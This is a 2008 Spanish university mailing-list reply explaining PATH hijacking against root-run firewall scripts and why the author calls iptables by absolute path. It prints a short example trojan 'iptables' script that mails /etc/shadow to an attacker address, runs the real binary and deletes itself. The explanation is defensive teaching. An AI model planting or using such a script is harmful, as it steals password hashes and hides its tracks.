[eside-ghost] Recordatorio: Introducción a Netfilter/IPTables a las 12:00 en la Sala de Videoconferencias

[Pablo Garaizar Sagarminaga]

Aupa!

El Wed, 12 Mar 2008 14:33:31 +0100
Andoni <jovenfiestero en yahoo.es> comentaba:

> ¿se han subido las transparencias a la web? o yo estoy ciego o no
> estan.

No, pretendo subir todo al terminar la Semana ESIDE (y estar un poco
menos atareado).

> exactamente por que dijistes que habia que declarar una variable a
> /sbin/iptables. he visto algunos script por internet y nadie hace eso.

Es que soy un poco rarito, wokepaaaatxa :-D

No, en serio, tiene que ver con un ataque bastante mítico y la variable
PATH: el script del firewall se va a ejecutar como root (muchos
privilegios), así que si alguien consigue crear un ejecutable que se
llame iptables en un directorio que esté antes en el PATH que /sbin, se
ejecutará ese programa y no el iptables original.

Imagínate un programa iptables copiado en /bin/ que tenga este
contenido:

#!/bin/sh
cat /etc/shadow | mail -s "Hacked" megahacker en gmail.com
/sbin/iptables $*
rm $0

¿Qué haría?

1) Mandarse el fichero de contraseñas al mail.
2) Ejecutar el verdadero iptables para no dar el cantazo.
3) Borrarse a sí mismo para no dejar huella.

Así que si el PATH está mal configurado o algún directorio que esté
antes que sbin tiene mal los permisos, la puedes liar con eso.

-- 
  Pablo Garaizar Sagarminaga
  ONTE (Oficina de Nuevas Tecnologías y Educación)
  Universidad de Deusto
  Avda. de las Universidades 24
  48007 Bilbao - Spain

  Phone:       +34-94-4139000 Ext 2980
  Fax:                  +34-94-4139101
  Web:     http://onte.eside.deusto.es